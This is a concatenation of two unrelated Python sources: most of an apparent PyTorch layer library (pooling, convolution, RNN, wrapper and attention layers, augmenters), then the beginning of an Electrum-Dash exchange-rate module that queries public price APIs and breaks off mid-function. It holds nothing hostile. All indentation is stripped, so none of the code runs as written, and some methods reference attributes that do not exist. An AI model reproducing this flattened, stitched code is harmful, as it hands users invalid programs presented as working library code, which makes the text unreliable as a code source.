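#     a, b = torch.randn(32, 10, 4), torch.randn(32, 10, 6)
#     out = cat([a, b], dim=1)   # concatenates the feature dims -> 32 x 10 x 10
#     out = cat([a, b], dim=-1)  # negative dims are passed through unchanged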
class Add(Layer):
"""Layer that adds a list of inputs.
It takes as input a list of tensors,
all of the same shape, and returns
a single tensor (also of the same shape).
# Examples
```python
import pyjet
input1 = torch.randn(32, 16)
x1 = pyjet.layers.FullyConnected(8, activation='relu')(input1)
input2 = torch.randn(32, 16)
x2 = pyjet.layers.FullyConnected(8, activation='relu')(input2)
added = pyjet.layers.Add()([x1, x2]) # equivalent to added = x1 + x2
out = pyjet.layers.FullyConnected(4)(added)
```
"""
def __init__(self):
super(Add, self).__init__()
def forward(self, seq):
return sum(seq)
# noise.py
class GaussianNoise1D(Layer):
def __init__(self, std=0.05, augment_prob=1.0):
super().__init__()
self.std = std
self.augment_prob = augment_prob
self.noise_size = tuple()
self.noise = None
self.mask_sample = None
self.__descriptor = "{name}(std={std}, augment_prob={augment_prob})".format(name=self.__class__.__name__, std=std, augment_prob=augment_prob)
logging.info("Creating layer %r" % self)
def forward(self, x):
if not self.training:
return x
self.init_noise(x)
if self.augment_prob != 1.0:
# 0 out the elements we don't want to change
self.noise.data.masked_fill_(self.mask_sample > self.augment_prob, 0.)
return x + self.noise
def init_noise(self, x):
# Create the noise (w/ mem optimization)
x_shape = tuple(x.size())
if self.noise_size != x_shape:
self.noise = Variable(zeros(*x_shape), requires_grad=False)
self.mask_sample = None if self.augment_prob == 1.0 else rand(*x_shape[:-1]).unsqueeze(-1)
self.noise_size = x_shape
else:
if self.mask_sample is not None:
self.mask_sample.uniform_()
self.noise.data.normal_(0, std=self.std)
def __str__(self):
return self.__descriptor
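# Example (hedged usage sketch, assuming Layer behaves like an nn.Module with
# train()/eval() modes): additive Gaussian noise applied only while training,
# optionally to a random subset of timesteps:
#
#     noise = GaussianNoise1D(std=0.1, augment_prob=0.5)
#     noise.train()
#     y = noise(x)   # x plus N(0, 0.1) noise on roughly half of the timesteps
#     noise.eval()
#     y = noise(x)   # identity at evaluation time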
# pooling.py
def build_strided_pool(name, kernel_size, stride=None, padding=1, dilation=1):
layer = StridedPool.pool_funcs[name](kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation)
logging.info("Creating layer: %r" % layer)
return layer
class UpSampling(Layer):
def __init__(self, size=None, scale_factor=None, mode='nearest'):
super(UpSampling, self).__init__()
self.upsampling = partial(F.interpolate, size=size, scale_factor=scale_factor, mode=mode)
self.size = size
self.scale_factor = scale_factor
self.mode = mode
def calc_output_size(self, input_size):
if self.size is not None:
return LongTensor(self.size)
else:
return input_size * self.scale_factor
def calc_input_size(self, output_size):
if self.size is not None:
raise ValueError("Cannot know input size if deterministic output size is used")
else:
return output_size / self.scale_factor
def forward(self, x):
# Expect x as BatchSize x Length1 x ... x LengthN x Filters
if channels_mode == "channels_last":
return self.unfix_input(self.upsampling(self.fix_input(x)))
else:
return self.upsampling(x)
def fix_input(self, x):
raise NotImplementedError()
def unfix_input(self, x):
raise NotImplementedError()
def __str__(self):
return "%r" % self.upsampling
class UpSampling2D(UpSampling):
def fix_input(self, inputs):
return inputs.permute(0, 3, 1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 1).contiguous()
class StridedPool(Layer):
pool_funcs = {"max1d": nn.MaxPool1d,
"max2d": nn.MaxPool2d,
"max3d": nn.MaxPool3d,
"avg1d": nn.AvgPool1d,
"avg2d": nn.AvgPool2d,
"avg3d": nn.AvgPool3d}
def __init__(self, pool_type, kernel_size, stride=None, padding='same', dilation=1):
super(StridedPool, self).__init__()
padding = (kernel_size - 1) // 2 if padding == 'same' else padding
self.pool_type = pool_type
self.kernel_size = kernel_size
if stride is None:
stride = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.pool = build_strided_pool(pool_type, kernel_size, stride=stride, padding=padding, dilation=dilation)
def calc_output_size(self, input_size):
"""
NOTE: This is designed for pytorch longtensors, if you pass an integer, make sure to cast it back to an
integer as python3 will perform float division on it
"""
output_size = (input_size - self.dilation * (self.kernel_size - 1) + 2 * self.padding - 1) // self.stride + 1
return output_size
def calc_input_size(self, output_size):
return (output_size - 1) * self.stride - 2 * self.padding + 1 + self.dilation * (self.kernel_size - 1)
def forward(self, x):
# Expect x as BatchSize x Length1 x ... x LengthN x Filters
if channels_mode == "channels_last":
return self.unfix_input(self.pool(self.fix_input(x)))
else:
return self.pool(x)
def fix_input(self, x):
raise NotImplementedError()
def unfix_input(self, x):
raise NotImplementedError()
def __str__(self):
return "%r" % self.pool
class Strided1D(StridedPool):
def fix_input(self, inputs):
return inputs.transpose(1, 2)
def unfix_input(self, outputs):
return outputs.transpose(1, 2)
class Strided2D(StridedPool):
def fix_input(self, inputs):
return inputs.permute(0, 3, 1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 1).contiguous()
class MaxPooling1D(Strided1D):
def __init__(self, kernel_size, stride=None, padding='same', dilation=1):
super(MaxPooling1D, self).__init__("max1d", kernel_size, stride=stride, padding=padding, dilation=dilation)
class SequenceMaxPooling1D(MaxPooling1D):
def forward(self, seq_inputs):
return [super(SequenceMaxPooling1D, self).forward(sample.unsqueeze(0)).squeeze(0) for sample in seq_inputs]
class AveragePooling1D(Strided1D):
def __init__(self, kernel_size, stride=None, padding='same', dilation=1):
super(AveragePooling1D, self).__init__("avg1d", kernel_size, stride=stride, padding=padding, dilation=dilation)
class MaxPooling2D(Strided2D):
def __init__(self, kernel_size, stride=None, padding='same', dilation=1):
super(MaxPooling2D, self).__init__("max2d", kernel_size, stride=stride, padding=padding, dilation=dilation)
class GlobalMaxPooling1D(Layer):
def __init__(self):
super(GlobalMaxPooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x L x E
return torch.max(x, dim=1)[0]
class SequenceGlobalMaxPooling1D(Layer):
def __init__(self):
super(SequenceGlobalMaxPooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x Li x E
return torch.stack([torch.max(seq, dim=0)[0] for seq in x])
class GlobalAveragePooling1D(Layer):
def __init__(self):
super(GlobalAveragePooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x L x E
return torch.mean(x, dim=1)
class SequenceGlobalAveragePooling1D(Layer):
def __init__(self):
super(SequenceGlobalAveragePooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x Li x E
return torch.stack([torch.mean(seq, dim=0) for seq in x])
class KMaxPooling1D(Layer):
def __init__(self, k):
super(KMaxPooling1D, self).__init__()
self.k = k
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return self.k * input_size / input_size
def forward(self, x):
# B x L x E
return kmax_pooling(x, 1, self.k)
def __str__(self):
return self.__class__.__name__ + "(k=%s)" % self.k
# convolutional.py
# TODO: Add padding and cropping layers
def build_conv(dimensions, input_size, output_size, kernel_size, stride=1,
dilation=1, groups=1, use_bias=True, input_activation='linear',
activation='linear', num_layers=1,
input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
# Create the sequential
layer = nn.Sequential()
# Add the input dropout
if input_dropout:
layer.add_module(
name="input-dropout",
module=nn.Dropout(input_dropout))
if input_batchnorm:
layer.add_module(
name="input-batchnorm",
module=Conv.bn_constructors[dimensions](input_size))
if input_activation != 'linear':
try:
layer.add_module(
name="input_{}".format(input_activation),
module=get_activation_type(input_activation)(inplace=True)
)
except TypeError: # If inplace is not an option on the activation
layer.add_module(
name="input_{}".format(input_activation),
module=get_activation_type(input_activation)())
# Add each layer
for i in range(num_layers):
layer_input = input_size if i == 0 else output_size
layer.add_module(name="conv-%s" % i,
module=Conv.layer_constructors[dimensions](
layer_input, output_size, kernel_size,
stride=stride, dilation=dilation, groups=groups,
bias=use_bias))
if activation != "linear":
try:
layer.add_module(
name="{}-{}".format(activation, i),
module=get_activation_type(activation)(inplace=True)
)
except TypeError: # If inplace is not an option on the activation
layer.add_module(
name="{}-{}".format(activation, i),
module=get_activation_type(activation)()
)
if batchnorm:
layer.add_module(
name="batchnorm-%s" % i,
module=Conv.bn_constructors[dimensions](output_size))
if dropout:
layer.add_module(name="dropout-%s" % i, module=nn.Dropout(dropout))
logging.info("Creating layers: %r" % layer)
return layer
class Conv(Layer):
layer_constructors = {1: nn.Conv1d, 2: nn.Conv2d, 3: nn.Conv3d}
bn_constructors = {1: nn.BatchNorm1d, 2: nn.BatchNorm2d, 3: nn.BatchNorm3d}
def __init__(self, dimensions, filters, kernel_size, input_shape=None,
stride=1, padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear', num_layers=1,
input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv, self).__init__()
# Catch any bad padding inputs (NOTE: this does not catch negative padding)
if padding != 'same' and not isinstance(padding, int):
raise NotImplementedError("padding: %s" % padding)
if dimensions not in [1, 2, 3]:
raise NotImplementedError("Conv{}D".format(dimensions))
# Set up attributes
self.dimensions = dimensions
self.filters = filters
self.input_shape = input_shape
self.padding = padding
self.kernel_size = kernel_size
self.stride = stride
self.dilation = dilation
self.groups = groups
self.use_bias = use_bias
self.input_activation = input_activation
self.activation = activation
self.num_layers = num_layers
self.input_batchnorm = input_batchnorm
self.batchnorm = batchnorm
self.input_dropout = input_dropout
self.dropout = dropout
# Build the layers
self.conv_layers = []
def get_same_padding(self, input_len):
total_padding = int(self.stride * (input_len - 1) + 1 + self.dilation * (self.kernel_size - 1) - input_len)
if total_padding % 2 == 1:
pad_l = total_padding // 2
return pad_l, total_padding - pad_l
else:
pad = total_padding // 2
return pad, pad
def get_padding(self, input_len):
if self.padding != 'same':
return self.padding, self.padding
else:
return self.get_same_padding(input_len)
def pad_input(self, x):
raise NotImplementedError("Layer does not know how to pad input")
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
self.input_shape = get_input_shape(inputs)
if channels_mode == "channels_last":
input_channels = self.input_shape[-1]
else:
input_channels = self.input_shape[0]
self.conv_layers = build_conv(
self.dimensions, input_channels, self.filters,
self.kernel_size, stride=self.stride,
dilation=self.dilation, groups=self.groups, use_bias=self.use_bias,
input_activation=self.input_activation, activation=self.activation,
num_layers=self.num_layers, input_batchnorm=self.input_batchnorm,
batchnorm=self.batchnorm, input_dropout=self.input_dropout,
dropout=self.dropout)
def calc_output_size(self, input_size):
"""
NOTE: This is designed for pytorch longtensors, if you pass an integer, make sure to cast it back to an
integer as python3 will perform float division on it
"""
output_size = (input_size - self.dilation * (self.kernel_size - 1) + 2 * self.padding - 1) // self.stride + 1
return output_size
def calc_input_size(self, output_size):
return (output_size - 1) * self.stride - 2 * self.padding + 1 + self.dilation * (self.kernel_size - 1)
def forward(self, inputs):
if not self.built:
self.__build_layer(inputs)
# Expect inputs as BatchSize x Length1 x ... x LengthN x Filters
if channels_mode == "channels_last":
inputs = self.fix_input(inputs)
inputs = self.conv_layers(self.pad_input(inputs))
if channels_mode == "channels_last":
inputs = self.unfix_input(inputs)
return inputs
def reset_parameters(self):
for layer in self.conv_layers:
if any(isinstance(layer, self.layer_constructors[dim]) or isinstance(layer, self.bn_constructors[dim])
for dim in self.layer_constructors):
logging.info("Resetting layer %s" % layer)
layer.reset_parameters()
def __str__(self):
return "%r" % self.conv_layers
class Conv1D(Conv):
def __init__(self, filters, kernel_size, input_shape=None, stride=1,
padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear',
num_layers=1, input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv1D, self).__init__(1, filters, kernel_size,
input_shape=input_shape, stride=stride,
padding=padding,
dilation=dilation, groups=groups,
use_bias=use_bias,
input_activation=input_activation,
activation=activation,
num_layers=num_layers,
input_batchnorm=input_batchnorm,
batchnorm=batchnorm,
input_dropout=input_dropout,
dropout=dropout)
def fix_input(self, inputs):
return inputs.transpose(1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.transpose(1, 2).contiguous()
def pad_input(self, inputs):
# inputs is batch_size x channels x length
return F.pad(inputs, self.get_padding(inputs.size(2)))
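# Example (hedged usage sketch, assuming channels_mode == "channels_last"): a 1D
# convolution with 'same' padding keeps the length dimension when stride is 1:
#
#     conv = Conv1D(filters=64, kernel_size=3, activation='relu')
#     x = torch.randn(8, 100, 32)   # B x L x F
#     y = conv(x)                   # 8 x 100 x 64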
class Conv2D(Conv):
def __init__(self, filters, kernel_size, input_shape=None, stride=1,
padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear',
num_layers=1, input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv2D, self).__init__(2, filters, kernel_size,
input_shape=input_shape, stride=stride,
padding=padding,
dilation=dilation, groups=groups,
use_bias=use_bias,
input_activation=input_activation,
activation=activation,
num_layers=num_layers,
input_batchnorm=input_batchnorm,
batchnorm=batchnorm,
input_dropout=input_dropout,
dropout=dropout)
def fix_input(self, inputs):
return inputs.permute(0, 3, 1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 1).contiguous()
def pad_input(self, inputs):
# inputs is batch_size x channels x height x width
padding = self.get_padding(inputs.size(2)) + \
self.get_padding(inputs.size(3))
return F.pad(inputs, padding)
class Conv3D(Conv):
def __init__(self, filters, kernel_size, input_shape=None, stride=1,
padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear',
num_layers=1, input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv3D, self).__init__(3, filters, kernel_size,
input_shape=input_shape, stride=stride,
padding=padding,
dilation=dilation, groups=groups,
use_bias=use_bias,
input_activation=input_activation,
activation=activation,
num_layers=num_layers,
input_batchnorm=input_batchnorm,
batchnorm=batchnorm,
input_dropout=input_dropout,
dropout=dropout)
def fix_input(self, inputs):
return inputs.permute(0, 4, 1, 2, 3).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 4, 1).contiguous()
def pad_input(self, inputs):
# inputs is batch_size x channels x height x width x time
padding = self.get_padding(inputs.size(2)) + \
self.get_padding(inputs.size(3)) + \
self.get_padding(inputs.size(4))
return F.pad(inputs, padding)
# recurrent.py
def build_rnn(rnn_type, input_size, output_size, num_layers=1, bidirectional=False,
input_dropout=0.0, dropout=0.0):
# Create the sequential
layer = nn.Sequential()
# Add the input dropout
if input_dropout:
layer.add_module(name="input-dropout", module=nn.Dropout(input_dropout))
layer.add_module(name="rnn", module=RNN.layer_constructors[rnn_type](input_size, output_size, num_layers=num_layers, dropout=dropout,
bidirectional=bidirectional, batch_first=True))
logging.info("Creating layer: %r" % layer)
return layer
class RNN(Layer):
layer_constructors = {'gru': nn.GRU, 'lstm': nn.LSTM,
"tanh_simple": lambda *args, **kwargs: nn.RNN(*args, nonlinearity='tanh', **kwargs),
"relu_simple": lambda *args, **kwargs: nn.RNN(*args, nonlinearity='relu', **kwargs)}
def __init__(self, rnn_type, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False):
super(RNN, self).__init__()
units = units // 2 if bidirectional else units
# Set up the attributes
self.rnn_type = rnn_type
self.input_shape = input_shape
self.units = units
self.num_layers = num_layers
self.bidirectional = bidirectional
self.input_dropout = input_dropout
self.dropout = dropout
self.return_sequences = return_sequences
self.return_state = return_state
# Build the layers
self.rnn_layers = []
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
self.input_shape = get_input_shape(inputs)
self.rnn_layers = build_rnn(
self.rnn_type, self.input_shape[-1], self.units,
num_layers=self.num_layers, bidirectional=self.bidirectional,
input_dropout=self.input_dropout, dropout=self.dropout)
def calc_output_size(self, input_size):
return input_size
def forward(self, x):
if not self.built:
self.__build_layer(x)
x, states = self.rnn_layers(x)
if not self.return_sequences:
if self.bidirectional:
x = torch.cat([x[:, -1, :self.units], x[:, 0, self.units:]], dim=-1)
else:
x = x[:, -1]
if self.return_state:
return x, states
return x
def reset_parameters(self):
for layer in self.rnn_layers:
if isinstance(layer, nn.RNNBase):
logging.info("Resetting layer %s" % layer)
layer.reset_parameters()
def __str__(self):
return ("%r\n\treturn_sequences={}, return_state={}" % self.rnn_layers).format(self.return_sequences,
self.return_state)
class SimpleRNN(RNN):
def __init__(self, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False,
nonlinearity='tanh'):
rnn_type = nonlinearity + "_" + "simple"
super(SimpleRNN, self).__init__(
rnn_type, units, input_shape=input_shape, num_layers=num_layers,
bidirectional=bidirectional, input_dropout=input_dropout,
dropout=dropout, return_sequences=return_sequences,
return_state=return_state)
class GRU(RNN):
def __init__(self, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False):
super(GRU, self).__init__(
'gru', units, input_shape=input_shape, num_layers=num_layers,
bidirectional=bidirectional, input_dropout=input_dropout,
dropout=dropout, return_sequences=return_sequences,
return_state=return_state)
class LSTM(RNN):
def __init__(self, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False):
super(LSTM, self).__init__(
'lstm', units, input_shape=input_shape, num_layers=num_layers,
bidirectional=bidirectional, input_dropout=input_dropout,
dropout=dropout, return_sequences=return_sequences,
return_state=return_state)
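# Example (hedged usage sketch): a bidirectional GRU returning the full sequence;
# the requested units are split across the two directions, so the output feature
# size still equals the requested units:
#
#     rnn = GRU(128, bidirectional=True, return_sequences=True)
#     x = torch.randn(16, 50, 300)   # B x L x F
#     y = rnn(x)                     # 16 x 50 x 128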
# wrappers.py
class Identity(Layer):
"""
This is used to create layer wrappers without passing a layer.
"""
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
def calc_output_size(self, input_size):
return input_size
# Singleton Identity layer
Identity = Identity()
class SequenceInput(Layer):
"""
Wrapper for a layer that should take in variable length sequences as inputs.
This wrapper will take as input a list of (batch size number of) sequences.
Before passing to its layer, the wrapper will pad the sequences to the longest
sequence in the batch, pass to the layer, then unpad back to the list of sequence form.
The wrapper requires that sequence lengths are not modified when passed through the layer.
Dropout will be applied to the nonpadded sequence.
"""
def __init__(self, wrapped_layer=Identity, input_dropout=0., dropout=0., pad_value=0.):
super(SequenceInput, self).__init__()
self.layer = wrapped_layer
self.input_dropout = nn.Dropout(input_dropout)
self.input_dropout_p = input_dropout
self.dropout = nn.Dropout(dropout)
self.dropout_p = dropout
self.pad_value = pad_value
self.__descriptor = "SequenceInput(input_dropout=%s, dropout=%s, pad_value=%s)" % (
self.input_dropout, self.dropout, self.pad_value)
logging.info("Wrapping layer with %s: %r" % (self.__descriptor, self.layer))
def forward(self, x):
if self.input_dropout_p:
x = [self.input_dropout(sample.unsqueeze(0)).squeeze(0) for sample in x]
x, pad_lens = pad_sequences(x, pad_value=self.pad_value)
x = self.layer(x)
x = unpad_sequences(x, pad_lens)
if self.dropout_p:
x = [self.dropout(sample.unsqueeze(0)).squeeze(0) for sample in x]
return x
def reset_parameters(self):
self.layer.reset_parameters()
def __str__(self):
return self.__descriptor + "(%r)" % self.layer
class TimeDistributed(Layer):
def __init__(self, wrapped_layer):
super(TimeDistributed, self).__init__()
self.layer = wrapped_layer
logging.info("TimeDistributing %r layer" % self.layer)
def forward(self, x):
x, seq_lens = pack_sequences(x) # B*Li x I
x = self.layer(x) # B*Li x O
x = unpack_sequences(x, seq_lens)
return x
def reset_parameters(self):
self.layer.reset_parameters()
def __str__(self):
return "TimeDistributed" + "(%r)" % self.layer
class MaskedLayer(Layer):
def __init__(self, layer=Identity, mask_value=0.0, dim=1):
super(MaskedLayer, self).__init__()
self.layer = layer
self.dim = dim
if dim == 1:
self.masker = MaskedInput(mask_value=mask_value)
elif dim == 2:
self.masker = MaskedInput2D(mask_value=mask_value)
else:
raise NotImplementedError("dim=%s" % dim)
logging.info("Masking {} layer with mask_value={}".format(self.layer, mask_value))
def forward(self, x, seq_lens):
x = self.masker(x, seq_lens)
x = self.layer(x)
seq_lens = self.layer.calc_output_size(seq_lens)
return x, seq_lens
def reset_parameters(self):
self.layer.reset_parameters()
# attentional.py
class ContextAttention(Layer):
def __init__(self, units, input_shape=None, activation='tanh',
batchnorm=False, padded_input=True, dropout=0.0):
super(ContextAttention, self).__init__()
self.units = units
self.input_shape = input_shape
self.activation_name = activation
self.batchnorm = batchnorm
self.padded_input = padded_input
self.dropout = dropout
self.attentional_module = None
self.context_vector = None
self.context_attention = None
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
# Use the 0th input since the inputs are time distributed
self.input_shape = get_input_shape(inputs[0])
self.attentional_module = FullyConnected(
self.input_shape[0], input_shape=self.input_shape,
activation=self.activation_name, batchnorm=self.batchnorm,
dropout=self.dropout)
self.context_vector = FullyConnected(
self.units, input_shape=self.input_shape, use_bias=False,
batchnorm=False)
self.context_attention = TimeDistributed(
nn.Sequential(self.attentional_module, self.context_vector)
)
def forward(self, x, seq_lens=None):
if self.padded_input:
padded_input = x
if seq_lens is None:
seq_lens = LongTensor([x.size(1)] * x.size(0))
x = unpad_sequences(x, seq_lens)
else:
padded_input, _ = pad_sequences(x) # B x L x H
# Build the layer if we don't know the input shape
if not self.built:
self.__build_layer(x)
# The input comes in as B x Li x E
att = self.context_attention(x) # B x L x H
att, _ = seq_softmax(att, return_padded=True) # B x L x K
out = torch.bmm(att.transpose(1, 2), padded_input) # B x K x H
return out.squeeze_(1)
def reset_parameters(self):
if self.built:
self.attentional_module.reset_parameters()
self.context_vector.reset_parameters()
def __str__(self):
return "%r" % self.pool
class ContextMaxPool1D(Layer):
def __init__(self, units=1, input_shape=None, activation='linear',
batchnorm=False, padded_input=True, dropout=0.0):
super(ContextMaxPool1D, self).__init__()
self.units = units
self.input_shape = input_shape
self.activation = activation
self.batchnorm = batchnorm
self.padded_input = padded_input
self.dropout = dropout
self.max_pool = SequenceGlobalMaxPooling1D()
self.context_attention = None
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
# Use the 0th input since the inputs are time distributed
self.input_shape = get_input_shape(inputs[0])
self.context_attention = nn.ModuleList(
[TimeDistributed(
FullyConnected(self.input_shape[0],
input_shape=self.input_shape, batchnorm=self.batchnorm,
activation=self.activation, dropout=self.dropout
)) for _ in range(self.units)
]
)
def forward(self, x, seq_lens=None):
if self.padded_input:
padded_input = x
x = unpad_sequences(x, seq_lens)
else:
padded_input, _ = pad_sequences(x) # B x L x H
# Build the layer if we don't know the input shape
if not self.built:
self.__build_layer(x)
# The input comes in as B x Li x E
out_heads = torch.stack([self.max_pool(head(x)) for head in self.context_attention], dim=1) # B x K x H
return out_heads.squeeze_(1)
def reset_parameters(self):
if self.built:
for i in range(len(self.context_attention)):
self.context_attention[i].reset_parameters()
def __str__(self):
return "%r" % self.pool
"""
AUGMENTERS
Files included:
- augmenters.py
Files not included:
image.py
"""
class Augmenter(object):
def __init__(self, labels=True, augment_labels=False):
self.labels = labels
self.augment_labels = augment_labels
def _augment(self, batch):
# Split the batch if necessary
if self.labels:
x, y = batch
seed = np.random.randint(2 ** 32)
if self.augment_labels:
np.random.seed(seed)
y = self.augment(y)
np.random.seed(seed)
x = self.augment(x)
return x, y
else:
x = batch
return self.augment(x)
def augment(self, x):
raise NotImplementedError()
def __call__(self, generator):
return AugmenterGenerator(self, generator)
class AugmenterGenerator(BatchGenerator):
def __init__(self, augmenter, generator):
# Copy the steps per epoch and batch size if it has one
if hasattr(generator, "steps_per_epoch") \
and hasattr(generator, "batch_size"):
super(AugmenterGenerator, self).__init__(
steps_per_epoch=generator.steps_per_epoch,
batch_size=generator.batch_size)
else:
logging.warning("Input generator does not have a "
"steps_per_epoch or batch_size "
"attribute. Continuing without them.")
self.augmenter = augmenter
self.generator = generator
def __next__(self):
return self.augmenter._augment(next(self.generator))
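# Example (hedged sketch): a concrete Augmenter that adds jitter to the inputs of
# every (x, y) batch produced by a generator; only augment() needs to be defined,
# and `train_gen` below is a hypothetical batch generator:
#
#     class JitterAugmenter(Augmenter):
#         def augment(self, x):
#             return x + np.random.normal(0., 0.01, size=x.shape)
#
#     augmented_gen = JitterAugmenter()(train_gen)   # wraps the original generator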
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob, make_dir
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8, 'ETH': 8}
DEFAULT_EXCHANGE = 'BitcoinAverage'
DEFAULT_CCY = 'USD'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Dash-Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Dash-Electrum'
})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
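# Example (hedged sketch, not one of the bundled exchanges): a minimal subclass
# only has to implement get_rates(); history support is optional and comes from
# history_ccys()/request_history(). The host name below is a placeholder:
#
# class ExampleExchange(ExchangeBase):
#     def get_rates(self, ccy):
#         json = self.get_json('api.example.com', '/ticker/DASH%s' % ccy)
#         return {ccy: Decimal(json['last'])}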
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com',
'/indices/local/ticker/DASH%s' % ccy)
return {ccy: Decimal(json['last'])}
def history_ccys(self):
return ['USD', 'EUR', 'PLN']
def request_history(self, ccy):
history = self.get_json('apiv2.bitcoinaverage.com',
"/indices/local/history/DASH%s"
"?period=alltime&format=json" % ccy)
return dict([(h['time'][:10], h['average']) for h in history])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=%s-DASH' % ccy)
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies[ccy] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
dash_ticker = json.get('BTC_DASH')
quote_currencies['BTC'] = Decimal(dash_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/dash/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
('BTC', 'price_btc'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
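# Example (sketch): dictinvert({'A': ['USD', 'EUR'], 'B': ['USD']})
# returns {'USD': ['A', 'B'], 'EUR': ['A']}.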
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
